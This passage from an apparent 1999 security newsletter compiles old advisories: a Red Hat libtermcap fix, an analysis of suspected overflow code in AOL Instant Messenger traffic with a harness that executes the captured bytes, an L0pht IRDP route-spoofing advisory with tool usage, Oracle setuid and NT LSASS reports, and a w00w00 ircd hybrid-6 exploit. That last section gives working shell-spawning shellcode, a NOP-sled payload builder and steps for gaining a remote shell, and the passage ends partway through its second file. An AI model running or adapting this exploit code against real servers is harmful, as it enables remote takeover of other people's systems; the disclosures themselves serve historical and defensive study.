Under Red Hat Linux 5.2 and 4.2, this could lead to local users
gaining root privileges, as xterm (as well as other possibly
setuid programs) are linked against libtermcap. Under Red Hat
Linux 6.0, xterm is not setuid root.
Thanks go to Kevin Vajk and the Linux Security Audit team for
noting and providing a fix for this vulnerability.
8. Solution:
For each RPM for your particular architecture, run:
rpm -Uvh <filename>
where filename is the name of the RPM.
9. Verification:
MD5 sum Package Name
--------------------------------------------------------------------------
31b5612edbb97c66600ac65c81c85fc2 i386/libtermcap-2.0.8-14.4.2.i386.rpm
8c26efd7648e92f23e9d2b5e7f48d3a4 i386/libtermcap-devel-2.0.8-14.4.2.i386.rpm
e6a3cb5ad06d6b64a40321b01d18931b alpha/libtermcap-2.0.8-14.4.2.alpha.rpm
15c288bd178504542be3b2cee077713a alpha/libtermcap-devel-2.0.8-14.4.2.alpha.rpm
8fb7ce4743c14b4163c4871dada51b63 sparc/libtermcap-2.0.8-14.4.2.sparc.rpm
bc7a74a44201b37fa6cf3515bd20a2bd sparc/libtermcap-devel-2.0.8-14.4.2.sparc.rpm
eb117c8f9f926b7fe75f6ebbdf3d2a6b SRPMS/libtermcap-2.0.8-14.4.2.src.rpm
9811a7c7665a18a46e9c876163628ba6 i386/libtermcap-2.0.8-14.5.2.i386.rpm
91248a539ee5fb708d194403c61ee14c i386/libtermcap-devel-2.0.8-14.5.2.i386.rpm
50a9dcb2fea451b03b743c46ea478418 alpha/libtermcap-2.0.8-14.5.2.alpha.rpm
a98bbcd7a3e8ab0b41983318aea5e919 alpha/libtermcap-devel-2.0.8-14.5.2.alpha.rpm
4c2f8d832512fabbe5dbcb89fc782159 sparc/libtermcap-2.0.8-14.5.2.sparc.rpm
b65b6267eed90d8149a9e52462b3cf10 sparc/libtermcap-devel-2.0.8-14.5.2.sparc.rpm
19caa6ab708d3a3f6af8eddafb5f53f2 SRPMS/libtermcap-2.0.8-14.5.2.src.rpm
4995cf0a7c181abe56565d82f12c7819 i386/libtermcap-2.0.8-15.i386.rpm
59d18de3f22abe5674575961b1390177 i386/libtermcap-devel-2.0.8-15.i386.rpm
611cdfb7f167242e7d3b2eaac866705a alpha/libtermcap-2.0.8-15.alpha.rpm
76098235237b5f051ad1266193d7b259 alpha/libtermcap-devel-2.0.8-15.alpha.rpm
846ad7a73b25d3eceab1949322337e14 sparc/libtermcap-2.0.8-15.sparc.rpm
6ddde808ec8b5bc7960851ef3188a6dd sparc/libtermcap-devel-2.0.8-15.sparc.rpm
6a29851494601540d642ff557bd590d6 SRPMS/libtermcap-2.0.8-15.src.rpm
These packages are PGP signed by Red Hat Inc. for security. Our key
is available at:
http://www.redhat.com/corp/contact.html
You can verify each package with the following command:
rpm --checksig <filename>
If you only wish to verify that each package has not been corrupted or
tampered with, examine only the md5sum with the following command:
rpm --checksig --nopgp <filename>
10. References:
@HWA
69.0 Possible AOL IM buffer overflow
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/*
Possible Buffer Overflow in AOL Instant Messenger
------------------------------------------------------------
Robert Graham
http://www.robertgraham.com/pubs/aol-exploit/
It appears to me that AOL might be running a buffer-overflow
exploit against their own clients.
BEFORE DOING ANYTHING ELSE: log onto AOL Instant Messaging and
take a trace of it with NetMon/tcpdump/Sniffer/etc. If this is
really happening, then AOL will likely fix it soon.
DETAILS
------------------------------------------------------------
Last friday I read the following in the NYTimes:
http://www.nytimes.com/library/tech/99/08/biztech/articles/13soft.html
This story brings up the implication that America Online might
be running a "buffer-overflow exploit" on in its own users.
They have already made 13 changes to their server code in
the past few weeks in order to stop Microsoft's clones from
working, so this may be yet another attempt.
According to whay I see, it appears to me that this implication
is correct. I see something that looks a lot like a buffer overflow
exploit when sniffing the connection between the client and AOL's servers.
You can reproduce this yourself:
1. log onto AOL Instant Messenger with the latest client that
comes with Communicator version WIN32 2.0.912, aka 2.0N.
(Click on [File/Help/Report a bug] to get the real version).
2. take a packet trace of the login procedures (I use NetMon).
3. look for the frame that I describe below.
4. copy/paste the frame data into the C program as I demonstrate
below.
5. step through the code in the debugger and disassemble it
THE PACKET
------------------------------------------------------------
AOL has removed their documentation from the Internet recently.
I had to download the GAIM (AIM client for Linux) source
code to figure things out.
A TCP connection is used. The format for each request/response
in the login process is:
byte[0] = 0x2a
byte[1] = 0x02 (type = 2 =login)
byte[2-3] = sequence number
byte[4-5] = length
byte[6-7] = type
byte[8-9] = subtype
However, multiple requests/responses can be queued into
a single packet. Following is the entire TCP packet I received
from the AOL server to my client:
00000000 00 00 BA 5E BA 11 00 A0 C9 B0 5E BD 08 00 45 00 ...^......^...E.
00000010 01 90 35 2A 40 00 7F 06 AF 73 0A 00 00 02 0A 00 ..5*@...s......
00000020 01 C9 04 38 0D 7F 25 F8 E3 A3 0C 19 A5 14 50 18 ...8.%.......P.
00000030 6E B5 4C E2 00 00/2A 02 31 F8 00 0C 00 0B 00 02 n.L...*.1.......
00000040 00 00 80 A2 F1 D5 04 B0/2A 02 31 F9 01 28 00 01 ........*.1..(..
00000050 00 13 00 00 80 A2 F1 D6 00 FF 00 0B 01 18*83*C4 ................
00000060 10 4F 8D 94 24 E4 FE FF FF 8B EC 03 AA F8 00 00 .O..$...........
00000070 00 90 90 90 90 8B 82 F0 00 00 00 8B 00 89 82 4E ...............N
00000080 00 00 00 8B 4D 04 03 8A F4 00 00 00 8D 82 42 00 ....M.........B.
00000090 00 00 89 45 10 B8 10 00 00 00 89 45 0C C9 FF E1 ...E.......E....
000000A0 00 01 00 20 00 00 00 00 00 00 00 04 00 00 00 00 ................
000000B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 10 ................
00000150 08 11 29 EC FF FF 44 00 00 00 00 00 00 00 FF 00 ..)...D.........
00000160 00 00 08 01 00 00 00 00 00 00 90 47 40 00 F8*E9*...........G@...
00000170 EA FE FF FF 00 00/2A 02 31 FA 00 22 00 01 00 13 ......*.1.."....
00000180 00 00 80 A2 F1 D7 00 04 00 0B 00 12 68 74 74 70 ............http
00000190 3A 2F 2F 77 77 77 2E 61 6F 6C 2E 63 6F 6D ://www.aol.com
There are three AIM segments in this packet, which I've
marked with slashes in the above decode. (Remember that
TCP is a stream based protocol, so application protocols
have to figure out their own boundaries, and you often
see multiple segments in a single TCP packet). The
second segment is of interest here, as marked by
the slashes.
It seems like the first byte of the embedded code
starts at the byte with the value 0x83 at offset 0x53
However, this isn't the buffer overflow, but the start of the
buffer itself. Immediately proceeding this is what appears to
be a length field. I'm thinking they only allow for a max
length of 256 (0x100), but the length field has an
extra 0x18 bytes. So if we go 256 bytes into the buffer,
we get some more stuff that looks like code.
I haven't analyzed all this stuff, but it appears that at
the end of the overflow section, it jumps back to the start
of the buffer that contains the code of the exploit.
[You only get so much wriggle room where you overflow,
because the more you overflow, the more of the stack you
overwrite; so the overflowed section has to be as small
as possible, and jump backwards to actually run something].
THE DECODE
------------------------------------------------------------
In this section, I have done a decode of all the bytes
in the segment. To the left are the original bytes,
to the right is either the protocol interpretation
or the disassembled output. These bytes are
in the same order as in the original packet.
2A 02 parse of logon sequence
31 F9 sequence number
01 28 length of this segment
00 01 00 13 type/subtype field of this packet
00 00 80 A2 F1 D6 00 FF 00 0B unknown data
01 18 length of data field
83 C4 10 add esp,10h
4F dec edi
8D 94 24 E4 FE FF FF lea edx,dword ptr [esp-11Ch]
8B EC mov ebp,esp
03 AA F8 00 00 00 add ebp,dword ptr [edx+0F8h]
90 nop
90 nop
90 nop
90 nop
8B 82 F0 00 00 00 mov eax,dword ptr [edx+0F0h]
8B 00 mov eax,dword ptr [eax]
89 82 4E 00 00 00 mov dword ptr [edx+4Eh],eax
8B 4D 04 mov ecx,dword ptr [ebp+4]
03 8A F4 00 00 00 add ecx,dword ptr [edx+0F4h]
8D 82 42 00 00 00 lea eax,dword ptr [edx+42h]
89 45 10 mov dword ptr [ebp+10h],eax
B8 10 00 00 00 mov eax,10h
89 45 0C mov dword ptr [ebp+0Ch],eax
C9 leave
FF E1 jmp ecx
00 01 00 20 00 00 00 00 00 00 00 04 00 00 00 00 filler
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 block
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 that
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 doesn't
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 mean
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 much
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 10 start of
08 11 29 EC FF FF 44 00 00 00 00 00 00 00 FF 00 overflow
00 00 08 01 00 00 00 00 00 00
90 47 40 00 jump address?
F8 unknown
E9 EA FE FF FF jmp back_to_start_of_buffer
00 00
You'll notice that there appears to be other code that
I haven't disassembled. I would have to second-guess
the original source, and I don't quite feel like it.
How to disassemble this? The easiest way is simply
to paste the data bytes into a program and RUN the code.
In theory, you could create a sample program that would
actually run this code completely without crashing
but that would take A LOT of effort.
THE CODE TO TEST IT
------------------------------------------------------------
*/
/* The data from the packet, starting at where I believe the data field
* begins.*/
unsigned char packet[] = {0x83, 0xC4,
0x10, 0x4F, 0x8D, 0x94, 0x24, 0xE4, 0xFE, 0xFF,
0xFF, 0x8B, 0xEC, 0x03, 0xAA, 0xF8, 0x00, 0x00,
0x00, 0x90, 0x90, 0x90, 0x90, 0x8B, 0x82, 0xF0,
0x00, 0x00, 0x00, 0x8B, 0x00, 0x89, 0x82, 0x4E,
0x00, 0x00, 0x00, 0x8B, 0x4D, 0x04, 0x03, 0x8A,
0xF4, 0x00, 0x00, 0x00, 0x8D, 0x82, 0x42, 0x00,
0x00, 0x00, 0x89, 0x45, 0x10, 0xB8, 0x10, 0x00,
0x00, 0x00, 0x89, 0x45, 0x0C, 0xC9, 0xFF, 0xE1,
0x00, 0x01, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x19, 0x10,
0x08, 0x11, 0x29, 0xEC, 0xFF, 0xFF, 0x44, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0x00,
0x00, 0x00, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x90, 0x47, 0x40, 0x00, 0xF8, 0xE9,
0xEA, 0xFE, 0xFF, 0xFF, 0x00, 0x00, 0x2A, 0x02,
0x31, 0xFA, 0x00, 0x22, 0x00, 0x01, 0x00, 0x13,
0x00, 0x00, 0x80, 0xA2, 0xF1, 0xD7, 0x00, 0x04,
0x00, 0x0B, 0x00, 0x12, 0x68, 0x74, 0x74, 0x70,
0x3A, 0x2F, 0x2F, 0x77, 0x77, 0x77, 0x2E, 0x61,
0x6F, 0x6C, 0x2E, 0x63, 0x6F, 0x6D};
/* Function point that will point to the buffer above */
void (*foo)();
int main()
{
/* Set to the point where it overflows (256-characters in),
* then add an offset to the jmp instruction that jumps back
* to the begining */
foo = packet+256+0x11;
/* In MS DevStudio, put a break point here, and then turn on
* disassembly mode [View/Debug Windows/Disassembly]. This will
* allow you to single step each assembly intruction, and will
* disassemble them for you. Also, turn on view of the original
* bytes by righ-hand-mouse-clicking on the disassembly and
* selecting [Code Bytes].
*/
foo();
return 0;
}
@HWA
70.0 L0pht security advisory:Attackers can remotely add default route entries
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--[begin]--
L0pht Security Advisory
Release date: August 11, 1999
Vulnerable: Microsoft Windows95a (w/winsock2), Windows95b
Windows98, Windows98se and Sun Microsystems
SunOS & Solaris operating systems.
Severity: Attackers can remotely add default route entries
on the victims host.
Status: Microsoft contacted, fix provided.
Author: sili@l0pht.com
URL: http://www.L0pht.com/advisories.html
Source code: http://www.l0pht.com/advisories/rdp.tar.gz
code written by Silicosis & Mudge
I. Problem
----------
The ICMP Router Discovery Protocol (IRDP) comes enabled by default on
DHCP clients that are running Microsoft Windows95 (w/winsock2),
Windows95b, Windows98, Windows98se, and Windows2000 machines. By
spoofing IRDP Router Advertisements, an attacker can remotely add default
route entries on a remote system. The default route entry added by the
attacker will be preferred over the default route obtained from the DHCP
server. While Windows2000 does indeed have IRDP enabled by default, it
less vulnerable as it is impossible to give it a route that is preferred
over the default route obtained via DHCP.
SunOS systems will also intentionally use IRDP under specific
conditions. For Solaris2.6, the IRDP daemon, in.rdisc, will be started
if the following conditions are met:
. The system is a host, not a router.
. The system did not learn a default gateway from a
DHCP server.
. The system does not have any static routes.
. The system does not have a valid /etc/defaultrouter
file.
It should be noted that the important point of this advisory is not
that ICMP Router Solicitation and Advertisement packets have no
authentication properties. Yes, this is a problem but it has long been
known. The dangerous aspect comes in various MS platforms enabling
this protocol and believing it _even when the DHCP setup specifies
not to use IRDP (dhcp option #31) (ie the operating system does this even
though you believe you are telling it NOT TO).
The tool provided with this advisory is the basis of what would
be used for everything from web page hacks, stealing credentials,
modifying or altering data, etc. involving vulnerable systems.
We believe most cable modem DHCP clients and large internal
organizations are at risk.
II. Risks
---------
The ICMP Router Discovery Protocol does not have any form of
authentication, making it impossible for end hosts to tell whether or not
the information they receive is valid. Because of this, attackers
can perform a number of attacks:
Passive monitoring: In a switched environment, an attacker
can use this to re-route the outbound traffic of
vulnerable systems through them. This will allow
them to monitor or record one side of the
conversation.
* For this to work, and attacker must be on the
* same network as the victim.
Man in the Middle: Taking the above attack to the next level, the
attacker would also be able to modify any of the
outgoing traffic or play man in the middle.
By sitting in the middle, the attacker can act as
a proxy between the victim and the end host. The
victim, while thinking that they are connected directly
to the end host, they are actually connected to the
attacker, and the attacker is connected to the end
host and is feeding the information through. If
the connection is to a secure webserver that uses SSL,
by sitting in the middle, the attacker would be able
to intercept the traffic, unencrypted.
A good example of this risk is on-line banking;
an attacker playing man-in-the-middle would be able
to intercept all of the banking information that
is relayed, without the victim's knowledge.
This is just a generic oversimplified scenario,
there are obvious issues with certificates that
the attacker would have to deal with if
attempting this scenario.
* For this to work, and attacker must be on the
* same network as the victim.
Denial of Service: Remote attackers can spoof these ICMP packets and
remotely add bad default-route entries into a
victims routing table. Because the victim's
system would be forwarding the frames to the
wrong address, it will be unable to reach other
networks.
Unfortunately, DHCP has quickly become popular and is
relied upon in most companies. In some cases, such as
cable & *DSL modems, users are required to use DHCP.
Because of the large number of vulnerable systems,
and the fact that this attack will penetrate firewalls
that do not stop incoming ICMP packets, this Denial
of Service attack can become quite severe.
It should be noted that the above attacks are documented in Section 7,
of RFC 1256. However, the RFC states states that the attacks are
launched by an attacker on the same network as the victim. In the Denial
of Service attack, this is not the case; an attacker can spoof IRDP
packets and corrupt the routing tables on systems that are on remote
networks.
While these attacks are not new, the fact that Windows95/98 DHCP
clients have been vulnerable for years, is. On systems running SunOS &
Solaris, it is easy to find documentation on IRDP by looking at the
startup scripts or manpages. On Windows95/98, however, information
has only become recently available in the Knowledge Bank.
III. Technical Details
----------------------
Upon startup, a system running MS Windows95/98 will always send 3 ICMP
Router Solicitation packets to the 224.0.0.2 multicast address. If the
machine is NOT configured as a DHCP client, it ignores any Router
Advertisements sent back to the host.
However, if the Windows machine is configured as a DHCP client, any
Router Advertisements sent to the machine will be accepted and processed.
Once an Advertisement is received, Windows checks to see how many Gateway
entries the packet contains. If the packet contains only 1 entry, it
checks to make sure the IP source address of the Advertisement is inside
the hosts subnet. If it is, the Router Address entry inside the
advertisement is checked to see that it is also within the host's subnet.
If so, a new default route entry is added. If the address is outside the
subnet, it the advertisement is silently ignored.
If a host receives a Router Advertisment that contains 2 or more Router
Addresses, the host will processes the packet even though the IP source
address is not local. If the host finds a Router Address inside the
advertisement that is inside the host's subnet, it will add a default
route entry for it.
Because the host does not care about the IP source address of the
Advertisement as long as it has more than one entry, attackers can now
create bogus IRDP packets that will bypass anti-spoofing filters.
Before the host can add a new default route entry, it has to determine
the route metric. On Windows95/98, normal default route entries obtained
from a DHCP server have a metric of 1. In order to determine the metric
for the default route entry obtained via IRDP, the Windows host subtracts
the Advertisement's Preference value from 1000. By creating an ICMP
Router Advertisement with a preference of 1000, the default gateway route
added will have a metric of 0, making it the preferred default route.
By adjusting the Lifetime value in the advertisement, an attacker can
adjust how many seconds the gateways are valid for.
DHCP Vendor Option #31, "Perform Router Discovery" has no effect on
disabling this. If you configure your DHCP server to implicitly disable
Router Discovery, the vulnerable Window95/98 hosts will ignore this, and
continue to update their routing tables with information gleemed via
IRDP.
IV. Fixes / Work-arounds
------------------------
Firewall / Routers:
Block all ICMP Type 9 & Type 10 packets. This should protect
against remote Denial of Service attacks.
Windows95/98:
The Microsoft Knowledge Base contains an article that gives info
on how to disable IRDP. It can be found at:
http://support.microsoft.com/support/kb/articles/q216/1/41.asp
Brief Summary of article:
IRDP can be disabled manually by adding "PerformRouterDiscovery"
value name and setting it to a dword value of 0, under the
following registry key(s):
HKLM\System\CurrentControlSet\Services\Class\NetTrans\####
Where #### is the binding for TCP/IP. More than one TCP/IP
binding may exist.
Solaris:
Configure your host to obtain a default gateway through DHCP,
static routes, or via the /etc/defaultrouter file. For more
information on IRDP refer to in.rdisc's man-page.
V. Detection
-------------
L0pht has released a NFR Intrusion Detection Module to detect both
Router Solicitations and Advertisements. You can find it at:
http://www.l0pht.com/NFR
NFR information can be found at http://www.nfr.net
VI. Source Code
-----------
L0pht is making available Proof-of-Concept code that will let individuals
test their systems & firewalls.
The source code can be found at: http://www.l0pht.com/advisories/rdp.tar.gz
Usage is fairly straight forward:
Usage: rdp -v -l -s -d <delay> -p <pref> -t <lifetime> -i <dev>
-S <src> -D <dst> -R <rtr> -r <optional 2nd rtr>
-v verbose
-l listen mode
-s send mode
-d <delay time between sending packets>
-n <number of rdp packets to send>
-I <ID value to place in IP packet>
-p <preference level>
-t <lifetime>
-i <interface to use for sniffing>
-S <source address to put in outgoing rdp packet>
-D <destination address to put in outgoing rdp packet>
-R <router address to advertise in rdp packet>
-r <optional 2nd router address to advertise in rdp packet>
Misc software notes:
Listen Mode: Software listens for ICMP Router Solicitations. If the
'-s' flag is specified as well, the software will answer
the Solicitations with ICMP Router Advertisements.
Preference: If the preference is not specified, it will use a default
of 1000, which will give the default route a metric of 0
on affected Windows systems.
2nd Router Addr: By using the '-r' flag and specifying a second router address
entry, the packet can contain a bogus source address and still
be processed for correct gateway entries by the
@HWA
71.0 Setuid problem in Oracle
~~~~~~~~~~~~~~~~~~~~~~~~~
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.6i
Message-ID: <19990817092232.B7591@securityfocus.com>
Date: Tue, 17 Aug 1999 09:22:32 -0700
Reply-To: aleph1@SECURITYFOCUS.COM
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Elias Levy <aleph1@SECURITYFOCUS.COM>
Subject: Security Bug in Oracle
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
Content-Length: 1179
Subject: Security Bug in Oracle
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
Content-Length: 1179
Sender: jason.axley@attws.com
Subject: Security Bug in Oracle
---------- Forwarded message ----------
Date: Mon, 16 Aug 1999 23:51:53 +0200
From: Gilles PARC <gparc@online.fr>
Subject: Security Bug in Oracle
Hi Listers,
I discover a new security problem with Oracle on Unix.
Once again, it's with a setuid program.
Do not confuse with a similar problem corrected
by ORACLE some month ago with a patch called setuid_patch.sh.
NEW PROBLEM :
if you have installed Oracle Intelligent agent, you will find in
$ORACLE_HOME/bin a program called dbsnmp.
This program is setuid root and was DELIBERATELY EXCLUDED
by Oracle in the forementioned patch.
The security hole resides in the fact that this program executes
a tcl script ( nmiconf.tcl ) located by default in
$ORACLE_HOME/network/agent/config.
Needless to say that you can easily bypass this default and have
your own malicious nmiconf.tcl script run under root privileges.
I verify this on HP-UX 10.20 with Oracle 7.3.3 and 8.0.4.3
on AIX 4.3 with Oracle 8.0.5.1
But it's probably Unix generic.
Regards
Gilles Parc
Email : gparc@mail.dotcom.fr
carpe diem !!
----- End forwarded message -----
--
Elias Levy
Security Focus
http://www.securityfocus.com/
@HWA
72.0 Vulnerability In LSA on Windows NT SP5
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
----- Forwarded message from "Galipeau, William" <William.Galipeau@FMR.COM> -----
Date: Thu, 12 Aug 1999 17:28:48 -0400
From: "Galipeau, William" <William.Galipeau@FMR.COM>
Subject: FW: Vulnerability In LSA on Windows NT SP5
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
I inadvertently sent this to the wrong address. My apologies.
-----Original Message-----
From: Galipeau, William
Sent: Thursday, August 12, 1999 10:15 AM
To: russ.cooper@rc.on.ca
Subject: Vulnerablity In LSA on Windows NT SP5
Russ,
A few months ago I found a vulnerability in NT 4.0 configured with SP5.
I downloaded a trial copy of Network Associates Cyber Cop version 5.0.
I ran a scan using all the Denial of Service based attack options. All
failed but one: the "Windows NT- LSASS.EXE Denial of Service attack."
When you run a scan on a NT 4.0 machine configured with SP5 (with or
without the LSA3 hot fix) utilizing this option, the target machine will
lock, not allowing users to authenticate to the server remotely or
locally. The only way to correct the problem is to physically reboot
the server. Also, to make matters worse, the audit logs on the target
server do not illustrate where the attacks were launched from. Because
Cyber Cop allows you to run this scan on any IP or any host of IPs, an
intruder could attack a large base of servers in a relatively short
amount of time without leaving a reliable audit trail.
I reported this issue to Microsoft on 6/23/99 (I have an incident
number). I have been following up with Microsoft, but they have been
reluctant to provide much detail on the issue. Hopefully you can help
motivate them.
Thanks
----- End forwarded message -----
@HWA
73.0 w00w00's efnet ircd advisory (exploit included)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[http://www.w00w00.org, comments to shok@dataforce.net]
SUMMARY
efnet ircd hybrid-6 (up to beta 58) have a vulnerability that can allow
remote access to the irc server. In most cases, you'll gain privileges of
the 'irc' user.
COMMENTS
This vulnerability was discovered by jduck and stranjer of w00w00 at
least 2 months ago. After discussing the vulnerability, it was reported
to Dianora by jduck and fixed. Hopefully the vulnerable irc servers have
been fixed. If not, it's unfortunate Dianora didn't notify the vulnerable
irc servers or they didn't take these 2 months to fix themselves (note:
we didn't wait that long on purpose.. we were just sidetracked with a
million other things).
DESCRIPTION
The vulnerability is in the invite handling code (m_invite). In a
channels with operators (ops) and modes +pi (paranoid + invite-only), a
channel invitation is reported to all other operators. The buffer used to
store the invitation notice can overflow its boundaries by up to 15
bytes.
Steps:
1. Client 1 (9chars!10chars@trivial) joins #199chars
2. Client 2 (trivial!trivial@trivial) joins #199chars
3. Client 1 sets mode #199chars +pio Client 2
4. Client 1 invites Client 3 (9chars!10chars@63chars) to #199chars
Note: client 1 and client 3 should _not_ be from the same host. With our
exploit, client 3 (compile/run hostname.c) first, then compile/run
ircdexp.c.
Client #1's server = vulnerable irc server (such as irc.arpa.com)
Client #2's server = trivial
Client #3's server = ComStud irc server (such as irc.prison.net), because
it allows shellcode chars in hostname
Using the following spoofed host (59 chars):
shellcodeshellcodeshellcodeshellcodeshellcodeshellcode.AAAA
[The ComStud ircd will check for a '.']
Here, EIP = 0x41414141 (AAAA). The other registers are negligable.
The hostlen is actually 63 bytes, but for this specific overflow, EIP is
overwritten at buf[54-58].
We have to take stdout/stdin descriptors into consideration. We are very
limited in size (only have 54 bytes for shellcode), so we can't fit bind
shellcode. Instead, we took the standard Linux x86 shellcode, dropped
exit handling code, added a close'd stdin, dup'd cptr->fd (cptr is the
first argument passed to m_invite). Since we only have 54 bytes to work
with, we can't fit code in to close stdout and dup cptr->fd, so output
will be sent to whatever terminald ircd was started from. If you do not
wish for the output to be seen, redirect everything (via '>') /dev/null.
As for how to go about spoofing, you have options:
1) Use the old DNS poison caching method
2) Use custom "fake binds" that will just pass on your shellcode as a
hostname in response to a DNS query (idea from nyt).
Option #2 is the approach we will take (hostname.c generates the shellcode
we'll use). This will work fine as long as you IP/hostname hasn't already
been cached. Because these "fake binds" are pretty popular (or have been
in the past), they should be easy to come by and are outside the scope of
this advisory.
So full steps are, client with the spoofed hostname, connect to a ComStud
ircd server (such as irc.prison.net), another client join the arbitrary
client, and another client join the target ircd hybrid-6 server (such as
irc.arpa.com). Once the channel is +pi (and your channel, ident,
username, etc. all the right length), invite the client with the spoofed
hostname. Fine-tune until you have root.
Thanks to: stranjer and jduck for their input and discovery of this
vulnerability.
People that deserve hellos: Mike (mike@eEye.com), vacuum
(vacuum@technotronic.com), awr (andrewr@rot26.net), dmess0r
(dmessor@el8.org).
-- Matt Conover (Shok) & w00w00 Security Team
invitee: (hostname.c)
/*
* ircd hybrid-6 exploit (invitee side)
* Matt Conover (Shok) & w00w00 Security Team
*
* This is used to generate the shellcoded hostname, which is used to
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <errno.h>
#define ERROR -1
#define OFFSET 0
#define HOSTLEN 59 /* this is the just the right len to overwrite eip */
unsigned long getesp();
/*
* Linux x86 shellcode, for a one-sided (input only) shell
* Shellcode close's and dup's stdin to your ircd sockfd, allowing
* you to give input. If we had more room for shellcode, we could make it
* a full duplex shell (two-sided). Unless you redirect output, it will
* be sent to the terminal that ran ircd.
*/
char shellcode[] =
"\xeb\x28\x5e\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x8b\x7e\x0d\x8a\x5f\x38"
"\xb0\x29\xcd\x80\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x89\xf3\x8d\x4e"
"\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xd3\xff\xff\xff/bin/sh";
/* --------------------------------------- */
unsigned long getesp()
{
__asm__("movl %esp,%eax"); /* return value stored in %eax with C */
}
int main(int argc, char **argv)
{
FILE *filefd;
char *argstr, *buf, *bufptr;
long addr;
int i, bufsize = HOSTLEN, offset = OFFSET;
if (argc > 3)
{
fprintf(stderr, "Usage: %s [bufsize] [offset]\n", argv[0]);
exit(ERROR);
}
if (argc == 2) bufsize = atoi(argv[2]);
if (argc == 3) offset = atoi(argv[3]);
if (bufsize < HOSTLEN)
{
printf("bufsize too small.. setting to minimum bufsize (%d)\n",
HOSTLEN);
bufsize = HOSTLEN;
}
buf = malloc(bufsize+1);
if (buf == NULL)
{
fprintf(stderr, "Error malloc'ing memory: %s\n", strerror(errno));
exit(ERROR);
}
addr = getesp() - offset;
printf("stack ptr (0x%lx) - offset (%d) = 0x%lx\n",
addr - offset, offset, addr);
bufptr = buf;
i = bufsize - (strlen(shellcode) + 5), memset(buf, 0x90, i);
bufptr = buf + i, memcpy(bufptr, shellcode, strlen(shellcode));
bufptr = buf + strlen(shellcode) + i, *bufptr++ = '.';
memcpy(bufptr, &addr, sizeof(addr));
buf[bufsize] = '\0';
printf("strlen(buf) = %d, strlen(shellcode) = %d\n\n",
strlen(buf), strlen(shellcode));
printf("%s\n", buf);
}
inviter:(ircdexp.c)
/*
* ircd hybrid 6 exploit (inviter side)
* Copyright (C) May 1999, Matt Conover & w00w00 Security Team
*
* When a channel is +pi with more than one op in it, it will send a
* message to all other ops in the the channel with the following format:
* INVITE: %s (%s invited %s [%s@%s])
*
* The steps to exploit this are as follows (requires 3 clients):
* 1. Client A (9chars!10chars@trivial) joins #199chars
